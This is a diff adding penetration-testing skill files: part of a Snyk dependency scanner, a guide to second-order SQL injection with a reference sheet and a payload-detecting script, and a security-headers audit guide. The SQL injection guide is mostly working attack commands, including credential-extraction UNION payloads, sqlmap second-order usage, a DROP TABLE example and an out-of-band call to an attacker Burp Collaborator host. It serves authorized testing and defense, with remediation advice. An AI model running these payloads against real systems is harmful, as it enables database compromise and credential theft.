+                        help="Also run snyk monitor for continuous tracking")
+    args = parser.parse_args()
+
+    project_path = os.path.abspath(args.project_path)
+    print(f"[*] Scanning dependencies in {project_path}")
+
+    snyk_json = run_snyk_test(
+        project_path,
+        manifest=args.manifest,
+        severity_threshold="low",
+        all_projects=args.all_projects
+    )
+
+    if "error" in snyk_json:
+        print(f"[ERROR] {snyk_json['error']}")
+        sys.exit(2)
+
+    vulns = parse_vulnerabilities(snyk_json)
+    vulns = deduplicate_vulns(vulns)
+
+    quality_gate = evaluate_quality_gate(vulns, args.severity_threshold, args.fail_on)
+    report = generate_report(vulns, quality_gate, snyk_json, project_path)
+
+    output_path = os.path.abspath(args.output)
+    with open(output_path, "w") as f:
+        json.dump(report, f, indent=2)
+    print(f"[*] Report: {output_path}")
+
+    print(f"\n[*] Dependencies: {snyk_json.get('dependencyCount', 'N/A')}")
+    print(f"[*] Vulnerabilities: {len(vulns)} (fixable: {quality_gate['fixable_count']})")
+    for sev, count in sorted(quality_gate["severity_counts"].items(),
+                             key=lambda x: SEVERITY_ORDER.get(x[0], 3)):
+        print(f"    {sev.upper()}: {count}")
+
+    if quality_gate["passed"]:
+        print(f"\n[PASS] Quality gate passed.")
+    else:
+        print(f"\n[FAIL] {quality_gate['blocking_count']} blocking vulnerabilities.")
+        for d in quality_gate["blocking_details"][:10]:
+            fix_info = f"fix: {d['fix']}" if d['upgradable'] else "no fix available"
+            print(f"  [{d['severity'].upper()}] {d['id']}: {d['package']} ({fix_info})")
+
+    if args.monitor:
+        print("\n[*] Running Snyk monitor for continuous tracking...")
+        subprocess.run(
+            ["snyk", "monitor", "--project-name", os.path.basename(project_path)],
+            cwd=project_path
+        )
+
+    if args.fail_on_findings and not quality_gate["passed"]:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-second-order-sql-injection/SKILL.md
+++ b/security/skills/performing-second-order-sql-injection/SKILL.md
@@ -1,0 +1,235 @@
+---
+name: performing-second-order-sql-injection
+description: Detect and exploit second-order SQL injection vulnerabilities where malicious
+  input is stored in a database and later executed in an unsafe SQL query during a
+  different application operation.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- second-order-sqli
+- stored-sql-injection
+- sql-injection
+- database-security
+- web-security
+- blind-injection
+- persistent-sqli
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+- T1055
+---
+
+# Performing Second-Order SQL Injection
+
+## When to Use
+- When first-order SQL injection testing reveals proper input sanitization at storage time
+- During penetration testing of applications with user-generated content stored in databases
+- When testing multi-step workflows where stored data feeds subsequent database queries
+- During assessment of admin panels that display or process user-submitted data
+- When evaluating stored procedure execution paths that use previously stored data
+
+## Prerequisites
+- Burp Suite Professional for request tracking across application flows
+- SQLMap with second-order injection support (--second-url flag)
+- Understanding of SQL injection fundamentals and blind extraction techniques
+- Two or more application functions (one for storing data, another for triggering execution)
+- Database error message monitoring or blind technique knowledge
+- Multiple user accounts for testing stored data across different contexts
+
+## Workflow
+
+### Step 1 — Identify Storage and Trigger Points
+```bash
+# Map the application to identify:
+# 1. STORAGE POINTS: Where user input is saved to database
+#    - User registration (username, email, address)
+#    - Profile update forms
+#    - Comment/review submission
+#    - File upload metadata
+#    - Order/booking details
+
+# 2. TRIGGER POINTS: Where stored data is used in queries
+#    - Admin panels displaying user data
+#    - Report generation
+#    - Search functionality using stored preferences
+#    - Password reset using stored email
+#    - Export/download features
+
+# Register a user with SQL injection in the username
+curl -X POST http://target.com/register \
+  -d "username=admin'--&password=test123&email=test@test.com"
+```
+
+### Step 2 — Inject Payloads via Storage Points
+```bash
+# Store SQL injection payload in username during registration
+curl -X POST http://target.com/register \
+  -d "username=test' OR '1'='1'--&password=Test1234&email=test@test.com"
+
+# Store injection in profile fields
+curl -X POST http://target.com/api/profile \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "display_name=test' UNION SELECT password FROM users WHERE username='admin'--"
+
+# Store injection in address field
+curl -X POST http://target.com/api/address \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "address=123 Main St' OR 1=1--&city=Test&zip=12345"
+
+# Store injection in comment/review
+curl -X POST http://target.com/api/review \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "product_id=1&review=Great product' UNION SELECT table_name FROM information_schema.tables--"
+```
+
+### Step 3 — Trigger Execution of Stored Payloads
+```bash
+# Trigger via password change (uses stored username)
+curl -X POST http://target.com/change-password \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "old_password=Test1234&new_password=NewPass123"
+
+# Trigger via admin user listing
+curl -H "Cookie: session=ADMIN_TOKEN" http://target.com/admin/users
+
+# Trigger via data export
+curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/export-data
+
+# Trigger via search using stored preferences
+curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/recommendations
+
+# Trigger via report generation
+curl -H "Cookie: session=ADMIN_TOKEN" "http://target.com/admin/reports?type=user-activity"
+```
+
+### Step 4 — Use SQLMap for Second-Order Injection
+```bash
+# SQLMap with --second-url for second-order injection
+# Store payload at registration, trigger at profile page
+sqlmap -u "http://target.com/register" \
+  --data="username=*&password=test&email=test@test.com" \
+  --second-url="http://target.com/profile" \
+  --cookie="session=AUTH_TOKEN" \
+  --batch --dbs
+
+# Use --second-req for complex trigger requests
+sqlmap -u "http://target.com/api/update-profile" \
+  --data="display_name=*" \
+  --second-req=trigger_request.txt \
+  --cookie="session=AUTH_TOKEN" \
+  --batch --tables
+
+# Content of trigger_request.txt:
+# GET /admin/users HTTP/1.1
+# Host: target.com
+# Cookie: session=ADMIN_TOKEN
+```
+
+### Step 5 — Blind Second-Order Extraction
+```bash
+# Boolean-based blind: Check if stored payload causes different behavior
+# Store: test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
+curl -X POST http://target.com/api/profile \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "display_name=test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--"
+
+# Trigger and observe response difference
+curl -H "Cookie: session=AUTH_TOKEN" http://target.com/profile
+
+# Time-based blind second-order
+# Store: test'; WAITFOR DELAY '0:0:5'--
+curl -X POST http://target.com/api/profile \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "display_name=test'; WAITFOR DELAY '0:0:5'--"
+
+# Out-of-band extraction via DNS
+# Store: test'; EXEC xp_dirtree '\\attacker.burpcollaborator.net\share'--
+curl -X POST http://target.com/api/profile \
+  -H "Cookie: session=AUTH_TOKEN" \
+  -d "display_name=test'; EXEC master..xp_dirtree '\\\\attacker.burpcollaborator.net\\share'--"
+```
+
+### Step 6 — Escalate to Full Database Compromise
+```bash
+# Once injection is confirmed, enumerate database
+# Store UNION-based payload
+curl -X POST http://target.com/api/profile \
+  -d "display_name=test' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--"
+
+# Extract credentials
+curl -X POST http://target.com/api/profile \
+  -d "display_name=test' UNION SELECT GROUP_CONCAT(username,0x3a,password) FROM users--"
+
+# Trigger execution and read results
+curl http://target.com/profile
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| Second-Order Injection | SQL payload stored safely, then executed unsafely in a later operation |
+| Storage Point | Application function where malicious input is saved to the database |
+| Trigger Point | Separate function that retrieves stored data and uses it in an unsafe query |
+| Trusted Data Assumption | Developer assumes database-stored data is safe, skipping parameterization |
+| Stored Procedure Chains | Injection through stored procedures that use previously saved user data |
+| Deferred Execution | Payload may not execute until hours or days after initial storage |
+| Cross-Context Injection | Data stored by one user triggers execution in another user's context |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| SQLMap | Automated SQL injection with --second-url support for second-order attacks |
+| Burp Suite | Request tracking and comparison across storage and trigger endpoints |
+| OWASP ZAP | Automated scanning with injection detection |
+| Commix | Automated command injection tool supporting second-order techniques |
+| Custom Python scripts | Building automated storage-and-trigger exploitation chains |
+| DBeaver/DataGrip | Direct database access for verifying stored payloads |
+
+## Common Scenarios
+
+1. **Username-Based Attack** — Register with a SQL injection payload as username; the payload executes when an admin views the user list
+2. **Password Change Exploitation** — Store injection in username; when changing password, the application uses the stored username in an unsafe UPDATE query
+3. **Report Generation Attack** — Inject payload in stored data fields; triggering report generation uses stored data in aggregate queries
+4. **Cross-User Injection** — Inject payload in a shared data field (comments, reviews) that triggers when another user or admin processes the data
+5. **Export Function Exploit** — Inject payload in profile data that triggers during CSV/PDF export operations
+
+## Output Format
+
+```
+## Second-Order SQL Injection Report
+- **Target**: http://target.com
+- **Storage Point**: POST /register (username field)
+- **Trigger Point**: GET /admin/users (admin panel)
+- **Database**: MySQL 8.0
+
+### Attack Flow
+1. Registered user with username: `admin' UNION SELECT password FROM users--`
+2. Application stored username safely using parameterized INSERT
+3. Admin panel retrieves usernames with unsafe string concatenation in SELECT
+4. Injected SQL executes, revealing all user passwords in admin view
+
+### Data Extracted
+| Table | Columns | Records |
+|-------|---------|---------|
+| users | username, password, email | 150 |
+| admin_tokens | token, user_id | 3 |
+
+### Remediation
+- Use parameterized queries for ALL database operations, including reads
+- Never trust data retrieved from the database as safe
+- Implement output encoding when displaying database content
+- Apply least-privilege database permissions
+- Enable SQL query logging for detecting injection attempts
+```

--- a/security/skills/performing-second-order-sql-injection/references/api-reference.md
+++ b/security/skills/performing-second-order-sql-injection/references/api-reference.md
@@ -1,0 +1,87 @@
+# Second-Order SQL Injection - API Reference
+
+## Attack Overview
+
+Second-order SQL injection occurs when user-supplied data is stored in a database and later incorporated into SQL queries without sanitization. Unlike first-order SQLi, the injection payload is not executed at the point of input but at a secondary execution point.
+
+**Attack Flow:**
+1. Attacker submits payload via input form (e.g., username registration)
+2. Application safely stores the payload in database (parameterized INSERT)
+3. Application later retrieves the stored value
+4. Stored value is concatenated into a new SQL query without sanitization
+5. Injection executes at the secondary query point
+
+## SQL Injection Patterns
+
+| Pattern | Example | Risk |
+|---------|---------|------|
+| UNION SELECT | `' UNION SELECT password FROM users--` | Data exfiltration |
+| Tautology | `' OR 1=1--` | Authentication bypass |
+| Stacked queries | `'; DROP TABLE users--` | Data destruction |
+| Time-based blind | `'; WAITFOR DELAY '0:0:5'--` | Data extraction |
+| Error-based | `' AND CONVERT(int, @@version)--` | Information disclosure |
+
+## Code Sink Patterns (Vulnerable Code)
+
+### Python (dangerous)
+```python
+cursor.execute(f"SELECT * FROM orders WHERE user='{username}'")
+cursor.execute("SELECT * FROM orders WHERE user='%s'" % username)
+```
+
+### Python (safe - parameterized)
+```python
+cursor.execute("SELECT * FROM orders WHERE user=%s", (username,))
+```
+
+### PHP (dangerous)
+```php
+$query = "SELECT * FROM orders WHERE user='" . $username . "'";
+```
+
+## Database Dump Format
+
+The agent expects JSON format for database analysis:
+```json
+{
+  "users": [
+    {"id": 1, "username": "admin", "email": "admin@example.com"},
+    {"id": 2, "username": "' UNION SELECT 1,2,3--", "email": "test@test.com"}
+  ],
+  "comments": [
+    {"id": 1, "body": "Normal comment"},
+    {"id": 2, "body": "'; DROP TABLE users--"}
+  ]
+}
+```
+
+## Data Flow Tracing
+
+The agent correlates stored payloads with code sinks by matching table/column names referenced in source code queries against tables containing injection payloads.
+
+## Prevention
+
+- Use parameterized queries (prepared statements) everywhere
+- Apply output encoding when using stored data in queries
+- Implement stored procedure-based data access
+- Use an ORM that auto-parameterizes queries
+- Validate data on both input AND retrieval from database
+
+## Output Schema
+
+```json
+{
+  "report": "second_order_sql_injection",
+  "total_findings": 15,
+  "stored_payloads": 5,
+  "code_sinks": 8,
+  "confirmed_attack_paths": 2,
+  "findings": [{"type": "confirmed_attack_path", "severity": "critical"}]
+}
+```
+
+## CLI Usage
+
+```bash
+python agent.py --db-dump database.json --source /app/src --output report.json
+```

--- a/security/skills/performing-second-order-sql-injection/scripts/agent.py
+++ b/security/skills/performing-second-order-sql-injection/scripts/agent.py
@@ -1,0 +1,163 @@
+#!/usr/bin/env python3
+"""Second-Order SQL Injection agent — detects stored SQL injection payloads
+by analyzing database content and tracing data flow from input to secondary
+query execution points."""
+
+import argparse
+import json
+import re
+from collections import Counter
+from datetime import datetime
+from pathlib import Path
+
+
+SQL_INJECTION_PATTERNS = [
+    r"(?i)(\bunion\b\s+\bselect\b)",
+    r"(?i)(\bor\b\s+1\s*=\s*1)",
+    r"(?i)(\band\b\s+1\s*=\s*1)",
+    r"(?i)(;\s*drop\s+table\b)",
+    r"(?i)(;\s*delete\s+from\b)",
+    r"(?i)(;\s*update\b.*\bset\b)",
+    r"(?i)(;\s*insert\s+into\b)",
+    r"(?i)(--\s*$)",
+    r"(?i)(\bexec\b\s*\()",
+    r"(?i)(\bwaitfor\b\s+\bdelay\b)",
+    r"(?i)(\bsleep\b\s*\(\d+\))",
+    r"(?i)(\bconvert\b\s*\()",
+    r"(?i)(\bcast\b\s*\(.*\bas\b)",
+    r"(?i)(\bchar\b\s*\(\d+\))",
+    r"(?i)(\b0x[0-9a-f]+\b)",
+    r"(\x27|\x22)\s*(or|and|union)",
+]
+
+
+def scan_database_values(db_dump_path: str) -> list[dict]:
+    """Scan a database dump (JSON format) for stored SQL injection payloads."""
+    data = json.loads(Path(db_dump_path).read_text(encoding="utf-8"))
+    findings = []
+    for table_name, rows in data.items():
+        for row_idx, row in enumerate(rows):
+            for col_name, value in row.items():
+                if not isinstance(value, str):
+                    continue
+                for pattern in SQL_INJECTION_PATTERNS:
+                    match = re.search(pattern, value)
+                    if match:
+                        findings.append({
+                            "type": "stored_sqli_payload",
+                            "severity": "critical",
+                            "table": table_name,
+                            "column": col_name,
+                            "row_index": row_idx,
+                            "matched_pattern": pattern,
+                            "matched_text": match.group(0),
+                            "value_preview": value[:200],
+                            "detail": f"SQL injection payload in {table_name}.{col_name} row {row_idx}",
+                        })
+                        break
+    return findings
+
+
+def scan_source_code(source_dir: str) -> list[dict]:
+    """Scan source code for second-order SQL injection sinks (string concatenation with DB data)."""
+    dangerous_patterns = [
+        (r"(?i)cursor\.execute\s*\(\s*[\"'].*%s", "python_format_string"),
+        (r"(?i)cursor\.execute\s*\(\s*f[\"']", "python_fstring"),
+        (r'(?i)query\s*=\s*["\'].*\+\s*\w+', "string_concatenation"),
+        (r"(?i)\.format\s*\(.*\)\s*\)", "python_format"),
+        (r'(?i)\$\{.*\}\s*(?:FROM|WHERE|INSERT|UPDATE|DELETE)', "template_literal"),
+        (r'(?i)sprintf\s*\(\s*["\'].*(?:SELECT|INSERT|UPDATE|DELETE)', "sprintf_query"),
+    ]
+    findings = []
+    src = Path(source_dir)
+    for ext in ("*.py", "*.php", "*.java", "*.js", "*.rb", "*.cs"):
+        for fpath in src.rglob(ext):
+            try:
+                content = fpath.read_text(encoding="utf-8", errors="ignore")
+                for line_no, line in enumerate(content.splitlines(), 1):
+                    for pattern, pattern_name in dangerous_patterns:
+                        if re.search(pattern, line):
+                            findings.append({
+                                "type": "second_order_sqli_sink",
+                                "severity": "high",
+                                "file": str(fpath),
+                                "line": line_no,
+                                "pattern": pattern_name,
+                                "code_snippet": line.strip()[:200],
+                                "detail": f"Potential second-order SQLi sink at {fpath.name}:{line_no}",
+                            })
+                            break
+            except OSError:
+                continue
+    return findings
+
+
+def trace_data_flow(db_findings: list[dict], code_findings: list[dict]) -> list[dict]:
+    """Correlate stored payloads with code sinks to identify complete attack paths."""
+    attack_paths = []
+    for db_f in db_findings:
+        table = db_f["table"]
+        column = db_f["column"]
+        for code_f in code_findings:
+            snippet = code_f.get("code_snippet", "").lower()
+            if table.lower() in snippet or column.lower() in snippet:
+                attack_paths.append({
+                    "type": "confirmed_attack_path",
+                    "severity": "critical",
+                    "source": f"{table}.{column}",
+                    "sink": f"{code_f['file']}:{code_f['line']}",
+                    "detail": f"Stored payload in {table}.{column} flows to query at {code_f['file']}:{code_f['line']}",
+                })
+    return attack_paths
+
+
+def generate_report(db_dump_path: str = None, source_dir: str = None) -> dict:
+    """Run analysis and build consolidated report."""
+    findings = []
+    db_findings = []
+    code_findings = []
+
+    if db_dump_path:
+        db_findings = scan_database_values(db_dump_path)
+        findings.extend(db_findings)
+    if source_dir:
+        code_findings = scan_source_code(source_dir)
+        findings.extend(code_findings)
+    if db_findings and code_findings:
+        attack_paths = trace_data_flow(db_findings, code_findings)
+        findings.extend(attack_paths)
+
+    severity_counts = Counter(f.get("severity", "info") for f in findings)
+    return {
+        "report": "second_order_sql_injection",
+        "generated_at": datetime.utcnow().isoformat() + "Z",
+        "total_findings": len(findings),
+        "severity_summary": dict(severity_counts),
+        "stored_payloads": len(db_findings),
+        "code_sinks": len(code_findings),
+        "confirmed_attack_paths": len([f for f in findings if f["type"] == "confirmed_attack_path"]),
+        "findings": findings,
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Second-Order SQL Injection Agent")
+    parser.add_argument("--db-dump", help="JSON database dump file to scan for stored payloads")
+    parser.add_argument("--source", help="Source code directory to scan for injection sinks")
+    parser.add_argument("--output", help="Output JSON file path")
+    args = parser.parse_args()
+
+    if not args.db_dump and not args.source:
+        parser.error("At least one of --db-dump or --source is required")
+
+    report = generate_report(args.db_dump, args.source)
+    output = json.dumps(report, indent=2)
+    if args.output:
+        Path(args.output).write_text(output, encoding="utf-8")
+        print(f"Report written to {args.output}")
+    else:
+        print(output)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/performing-security-headers-audit/SKILL.md
+++ b/security/skills/performing-security-headers-audit/SKILL.md
@@ -1,0 +1,325 @@
+---
+name: performing-security-headers-audit
+description: Auditing HTTP security headers including CSP, HSTS, X-Frame-Options,
+  and cookie attributes to identify missing or misconfigured browser-level protections.
+domain: cybersecurity
+subdomain: web-application-security
+tags:
+- penetration-testing
+- security-headers
+- csp
+- hsts
+- owasp
+- web-security
+- hardening
+version: '1.0'
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- ID.RA-01
+- PR.DS-10
+- DE.CM-01
+mitre_attack:
+- T1190
+- T1059.007
+- T1505.003
+- T1083
+---
+
+# Performing Security Headers Audit
+
+## When to Use
+
+- During authorized web application security assessments as a standard configuration review
+- When evaluating browser-level protections against XSS, clickjacking, and data leakage
+- For compliance assessments requiring security header implementation (PCI DSS, SOC 2)
+- When performing initial reconnaissance to identify easy-win security improvements
+- During CI/CD pipeline security gate checks for new deployments
+
+## Prerequisites
+
+- **Authorization**: Written scope for the target application (header review is low-risk)
+- **curl**: For fetching response headers from target endpoints
+- **SecurityHeaders.com**: Online scanner for quick header assessment
+- **Mozilla Observatory**: Mozilla's web security testing tool
+- **Burp Suite**: For comprehensive header analysis across multiple pages
+- **Browser DevTools**: For examining headers and CSP violations in real-time
+
+## Workflow
+
+### Step 1: Collect Security Headers from Target
+
+Retrieve and catalog all security-related response headers.
+
+```bash
+# Fetch all response headers
+curl -s -I "https://target.example.com/" | grep -iE \
+  "(strict-transport|content-security|x-frame|x-content-type|x-xss|referrer-policy|permissions-policy|feature-policy|x-permitted|cross-origin|set-cookie|server|x-powered-by|cache-control)"
+
+# Check headers across multiple pages
+PAGES=("/" "/login" "/api/health" "/admin" "/account/settings" "/static/app.js")
+
+for page in "${PAGES[@]}"; do
+  echo "=== $page ==="
+  curl -s -I "https://target.example.com$page" 2>/dev/null | grep -iE \
+    "(strict-transport|content-security|x-frame|x-content-type|x-xss|referrer-policy|permissions-policy|set-cookie|server|x-powered)"
+  echo
+done
+
+# Check both HTTP and HTTPS responses
+echo "=== HTTP Response ==="
+curl -s -I "http://target.example.com/" | head -20
+echo "=== HTTPS Response ==="
+curl -s -I "https://target.example.com/" | head -20
+```
+
+### Step 2: Assess Transport Security (HSTS)
+
+Evaluate HTTP Strict Transport Security configuration.
+
+```bash
+# Check HSTS header
+curl -s -I "https://target.example.com/" | grep -i "strict-transport-security"
+
+# Expected: Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
+
+# Verify HSTS attributes:
+# max-age: Should be >= 31536000 (1 year) for preload eligibility
+# includeSubDomains: Protects all subdomains
+# preload: Eligible for browser HSTS preload list
+
+# Check if HTTP redirects to HTTPS
+curl -s -I "http://target.example.com/" | head -5
+# Should be 301/302 redirect to https://
+
+# Check if HSTS is on the preload list
+# Visit: https://hstspreload.org/?domain=target.example.com
+
+# Test for HTTPS-only cookies
+curl -s -I "https://target.example.com/login" | grep -i "set-cookie"
+# All session cookies should have Secure flag
+
+# Check for mixed content
+curl -s "https://target.example.com/" | grep -oP "http://[^\"']+" | head -20
+# HTTP resources loaded on HTTPS pages create mixed content vulnerabilities
+```
+
+### Step 3: Audit Content Security Policy (CSP)
+
+Analyze CSP headers for effectiveness and potential bypasses.
+
+```bash
+# Extract CSP header
+CSP=$(curl -s -I "https://target.example.com/" | grep -i "content-security-policy" | cut -d: -f2-)
+echo "$CSP"
+
+# Check for dangerous directives:
+# 'unsafe-inline' in script-src: Allows inline scripts (XSS risk)
+# 'unsafe-eval' in script-src: Allows eval() (XSS risk)
+# * in any directive: Allows loading from any origin
+# data: in script-src: Allows data: URI scripts
+# Missing default-src: No fallback policy
+
+echo "$CSP" | tr ';' '\n' | while read directive; do
+  echo "  $directive"
+  if echo "$directive" | grep -q "unsafe-inline"; then
+    echo "    WARNING: unsafe-inline allows inline script execution"
+  fi
+  if echo "$directive" | grep -q "unsafe-eval"; then
+    echo "    WARNING: unsafe-eval allows eval() calls"
+  fi
+  if echo "$directive" | grep -q " \* "; then
+    echo "    WARNING: wildcard allows loading from any origin"
+  fi
+done
+
+# Check for CSP report-only (not enforcing)
+curl -s -I "https://target.example.com/" | grep -i "content-security-policy-report-only"
+# Report-only does NOT block violations, only logs them
+
+# Test CSP with Google's evaluator
+# https://csp-evaluator.withgoogle.com/
+# Paste the CSP header for automated analysis
+
+# Check for CSP bypass via whitelisted domains
+# If CDN domains are whitelisted, check for JSONP endpoints or angular libraries
+```
+
+### Step 4: Check Frame Protection and Click Defense Headers
+
+Verify anti-clickjacking and iframe embedding controls.
+
+```bash
+# X-Frame-Options
+curl -s -I "https://target.example.com/" | grep -i "x-frame-options"
+# Expected: DENY or SAMEORIGIN
+# ALLOW-FROM is deprecated and not supported in modern browsers
+
+# CSP frame-ancestors (supersedes X-Frame-Options)
+curl -s -I "https://target.example.com/" | grep -i "content-security-policy" | grep -o "frame-ancestors[^;]*"
+# Expected: frame-ancestors 'none' or frame-ancestors 'self'
+
+# X-Content-Type-Options
+curl -s -I "https://target.example.com/" | grep -i "x-content-type-options"
+# Expected: nosniff (prevents MIME type sniffing)
+
+# X-XSS-Protection (legacy, but still useful for older browsers)
+curl -s -I "https://target.example.com/" | grep -i "x-xss-protection"
+# Expected: 1; mode=block (or 0 if CSP is comprehensive)
+# Note: Modern recommendation is 0 (disable) when CSP is present
+
+# Referrer-Policy
+curl -s -I "https://target.example.com/" | grep -i "referrer-policy"
+# Expected: strict-origin-when-cross-origin or no-referrer
+# Prevents sensitive URL data from leaking via Referer header
+```
+
+### Step 5: Audit Cookie Security Attributes
+
+Examine session and authentication cookies for security flags.
+
+```bash
+# Fetch all Set-Cookie headers
+curl -s -I -L "https://target.example.com/login" | grep -i "set-cookie"
+
+# Check each cookie for required attributes:
+# Secure: Only sent over HTTPS
+# HttpOnly: Not accessible via JavaScript (prevents XSS cookie theft)
+# SameSite: Controls cross-site cookie sending (Strict, Lax, None)
+# Path: Restricts cookie scope
+# Domain: Controls which domains receive the cookie
+# Max-Age/Expires: Cookie lifetime
+
+# Automated cookie check
+curl -s -I "https://target.example.com/login" | grep -i "set-cookie" | while read line; do
+  echo "Cookie: $(echo "$line" | grep -oP '[^:]+=[^;]+')"
+  missing=""
+  echo "$line" | grep -qi "secure" || missing="$missing Secure"
+  echo "$line" | grep -qi "httponly" || missing="$missing HttpOnly"
+  echo "$line" | grep -qi "samesite" || missing="$missing SameSite"
+  if [ -n "$missing" ]; then
+    echo "  MISSING:$missing"
+  else
+    echo "  All flags present"
+  fi
+done
+
+# Check for __Host- and __Secure- cookie prefixes
+# __Host- cookies must have Secure, Path=/, no Domain
+# __Secure- cookies must have Secure flag
+```
+
+### Step 6: Check Permissions Policy and Information Disclosure
+
+Review browser feature controls and information leakage headers.
+
+```bash
+# Permissions-Policy (formerly Feature-Policy)
+curl -s -I "https://target.example.com/" | grep -i "permissions-policy"
+# Controls browser features: camera, microphone, geolocation, etc.
+# Expected: Restrict unused features
+# Example: permissions-policy: camera=(), microphone=(), geolocation=()
+
+# Cross-Origin headers
+curl -s -I "https://target.example.com/" | grep -iE "(cross-origin-embedder|cross-origin-opener|cross-origin-resource)"
+# COEP: Cross-Origin-Embedder-Policy: require-corp
+# COOP: Cross-Origin-Opener-Policy: same-origin
+# CORP: Cross-Origin-Resource-Policy: same-origin
+
+# Information disclosure headers to flag
+curl -s -I "https://target.example.com/" | grep -iE "(server|x-powered-by|x-aspnet|x-generator)"
+# Server: Apache/2.4.52 (should be removed or generic)
+# X-Powered-By: PHP/8.1.2 (should be removed)
+# These headers reveal technology stack to attackers
+
+# Cache-Control for sensitive pages
+curl -s -I "https://target.example.com/account/settings" | grep -i "cache-control"
+# Sensitive pages should have: Cache-Control: no-store, no-cache, must-revalidate
+# Prevents browser caching of sensitive data
+
+# Generate comprehensive report using online tools
+echo "Scan with SecurityHeaders.com: https://securityheaders.com/?q=target.example.com"
+echo "Scan with Mozilla Observatory: https://observatory.mozilla.org/analyze/target.example.com"
+```
+
+## Key Concepts
+
+| Concept | Description |
+|---------|-------------|
+| **HSTS** | Forces browsers to only use HTTPS for the domain, preventing protocol downgrade attacks |
+| **CSP** | Restricts which resources (scripts, styles, images) can load on the page |
+| **X-Frame-Options** | Controls whether the page can be embedded in iframes (clickjacking defense) |
+| **X-Content-Type-Options** | Prevents MIME type sniffing; forces browser to respect declared Content-Type |
+| **Referrer-Policy** | Controls how much referrer information is sent with cross-origin requests |
+| **Permissions-Policy** | Restricts browser features (camera, microphone, geolocation) available to the page |
+| **SameSite Cookie** | Controls when cookies are sent in cross-site contexts (Strict, Lax, None) |
+| **HSTS Preloading** | Hardcoding HSTS policy in browser source code for first-visit protection |
+
+## Tools & Systems
+
+| Tool | Purpose |
+|------|---------|
+| **SecurityHeaders.com** | Online scanner providing letter-grade security header assessment |
+| **Mozilla Observatory** | Comprehensive web security scanner with scoring and recommendations |
+| **CSP Evaluator (Google)** | Analyzes Content Security Policy for weaknesses and bypasses |
+| **Burp Suite Professional** | Inspecting response headers across all application pages |
+| **securityheaders (CLI)** | Command-line security header scanner |
+| **Hardenize** | TLS and security header monitoring service |
+
+## Common Scenarios
+
+### Scenario 1: Complete Header Absence
+A legacy application returns no security headers at all. No HSTS, CSP, X-Frame-Options, or cookie security flags. Every page is vulnerable to clickjacking, XSS has no browser-level mitigation, and cookies are sent over HTTP.
+
+### Scenario 2: Weak CSP with unsafe-inline
+The CSP header includes `script-src 'self' 'unsafe-inline'`. While it restricts external script loading, the `unsafe-inline` directive allows any inline script to execute, rendering the CSP ineffective against XSS.
+
+### Scenario 3: Session Cookie Without Secure Flag
+The session cookie is set without the `Secure` flag. On mixed HTTP/HTTPS sites, the session token can be intercepted by a network attacker via a plain HTTP request.
+
+### Scenario 4: Missing HSTS Enabling SSL Stripping
+No HSTS header is present. An attacker on the network can perform an SSL stripping attack, downgrading the victim's HTTPS connection to HTTP and intercepting all traffic.
+
+## Output Format
+
+```
+## Security Headers Audit Report
+
+**Target**: target.example.com
+**Grade**: D (SecurityHeaders.com)
+**Assessment Date**: 2024-01-15
+
+### Headers Assessment
+| Header | Status | Current Value | Recommended |
+|--------|--------|---------------|-------------|
+| Strict-Transport-Security | MISSING | - | max-age=31536000; includeSubDomains; preload |
+| Content-Security-Policy | WEAK | script-src 'self' 'unsafe-inline' | script-src 'self' 'nonce-{random}' |
+| X-Frame-Options | MISSING | - | DENY |
+| X-Content-Type-Options | PRESENT | nosniff | nosniff (OK) |
+| Referrer-Policy | MISSING | - | strict-origin-when-cross-origin |
+| Permissions-Policy | MISSING | - | camera=(), microphone=(), geolocation=() |
+| X-XSS-Protection | MISSING | - | 0 (with strong CSP) |
+
+### Cookie Security
+| Cookie | Secure | HttpOnly | SameSite | Path |
+|--------|--------|----------|----------|------|
+| session | NO | YES | Not set | / |
+| user_pref | NO | NO | Not set | / |
+| csrf_token | YES | NO | Strict | / |
+
+### Information Disclosure
+| Header | Value | Risk |
+|--------|-------|------|
+| Server | Apache/2.4.52 | Technology fingerprinting |
+| X-Powered-By | PHP/8.1.2 | Version-specific exploit targeting |
+
+### Recommendation Priority
+1. **Critical**: Add Secure and SameSite flags to session cookie
+2. **High**: Implement HSTS with min 1-year max-age
+3. **High**: Replace 'unsafe-inline' in CSP with nonce-based policy
+4. **Medium**: Add X-Frame-Options: DENY
+5. **Medium**: Add Referrer-Policy: strict-origin-when-cross-origin
+6. **Low**: Remove Server and X-Powered-By version information
+7. **Low**: Add Permissions-Policy to restrict unused browser features
+```

--- a/security/skills/performing-security-headers-audit/references/api-reference.md
+++ b/security/skills/performing-security-headers-audit/references/api-reference.md
@@ -1,0 +1,44 @@
+# API Reference: Security Headers Audit
+
+## Security Headers Checked
+
+| Header | Recommended Value | Purpose |
+|--------|------------------|---------|
+| `Strict-Transport-Security` | `max-age=31536000; includeSubDomains; preload` | Force HTTPS |
+| `Content-Security-Policy` | `script-src 'self' 'nonce-{random}'` | Restrict resource loading |
+| `X-Frame-Options` | `DENY` | Prevent clickjacking |
+| `X-Content-Type-Options` | `nosniff` | Prevent MIME sniffing |
+| `Referrer-Policy` | `strict-origin-when-cross-origin` | Control referrer leakage |
